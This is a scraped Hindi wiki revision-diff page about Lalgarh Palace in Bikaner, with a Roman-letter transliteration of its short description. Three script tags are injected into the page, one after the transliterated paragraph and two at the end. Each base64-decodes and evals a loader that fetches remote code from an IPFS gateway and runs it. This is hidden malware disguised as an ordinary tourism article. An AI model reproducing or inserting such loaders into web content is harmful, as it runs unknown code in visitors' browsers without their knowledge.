Difference between revisions of "लाल गढ़ महल बीकानेर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==सम्बंधित लिंक==" to "==संबंधित लेख==")
Line 1: Line 1:
 
[[बीकानेर]], [[राजस्थान]] का एक एतिहासिक नगर है, और [[बीकानेर पर्यटन]] के लिए भी जाना जाता है। महाराजा [[गंगा सिंह]] द्वारा अपने पिता महाराजा लाल सिंह की याद में निर्मित लाल बलुए पत्थर से बना यह महल वास्तुशिल्प का एक बेजोड़ नमूना है। महल के आर्कषण जाली का जरदोजी का काम हुआ है। खिले हुए बोगनवेलियाँ व नाचते हुए बगीचे देखने योग्य है। महल का कुछ हिस्सा एक हेरिटेज होटल व एक संग्रहालय में बदल दिया गया है जो श्री सार्दुल संग्रहालय के नाम से प्रसिद्ध है। संग्रहालय महल के समूचे प्रथम तल में बना हुआ है और इनमें सुरक्षित पुराने चित्र व वन्य जीवन की निशानियाँ संग्रहीत है।
 
[[बीकानेर]], [[राजस्थान]] का एक एतिहासिक नगर है, और [[बीकानेर पर्यटन]] के लिए भी जाना जाता है। महाराजा [[गंगा सिंह]] द्वारा अपने पिता महाराजा लाल सिंह की याद में निर्मित लाल बलुए पत्थर से बना यह महल वास्तुशिल्प का एक बेजोड़ नमूना है। महल के आर्कषण जाली का जरदोजी का काम हुआ है। खिले हुए बोगनवेलियाँ व नाचते हुए बगीचे देखने योग्य है। महल का कुछ हिस्सा एक हेरिटेज होटल व एक संग्रहालय में बदल दिया गया है जो श्री सार्दुल संग्रहालय के नाम से प्रसिद्ध है। संग्रहालय महल के समूचे प्रथम तल में बना हुआ है और इनमें सुरक्षित पुराने चित्र व वन्य जीवन की निशानियाँ संग्रहीत है।
 
+
{{प्रचार}}
 +
{{लेख प्रगति
 +
|आधार=
 +
|प्रारम्भिक= प्रारम्भिक1
 +
|माध्यमिक=
 +
|पूर्णता=
 +
|शोध=
 +
}}
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{राजस्थान के पर्यटन स्थल}}
 
{{राजस्थान के पर्यटन स्थल}}
 
+
{{भारत के दुर्ग}}
 
[[Category:राजस्थान]][[Category:राजस्थान_के_पर्यटन_स्थल]][[Category:पर्यटन_कोश]][[Category:बीकानेर]][[Category:बीकानेर_के_पर्यटन_स्थल]]__INDEX__
 
[[Category:राजस्थान]][[Category:राजस्थान_के_पर्यटन_स्थल]][[Category:पर्यटन_कोश]][[Category:बीकानेर]][[Category:बीकानेर_के_पर्यटन_स्थल]]__INDEX__

Revision as of 06:46, 26 April 2011

bikaner, rajasthan ka ek etihasik nagar hai, aur bikaner paryatan ke lie bhi jana jata hai. maharaja ganga sianh dvara apane pita maharaja lal sianh ki yad mean nirmit lal balue patthar se bana yah mahal vastushilp ka ek bejo d namoona hai. mahal ke arkashan jali ka jaradoji ka kam hua hai. khile hue boganaveliyaan v nachate hue bagiche dekhane yogy hai. mahal ka kuchh hissa ek heritej hotal v ek sangrahalay mean badal diya gaya hai jo shri sardul sangrahalay ke nam se prasiddh hai. sangrahalay mahal ke samooche pratham tal mean bana hua hai aur inamean surakshit purane chitr v vany jivan ki nishaniyaan sangrahit hai. <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>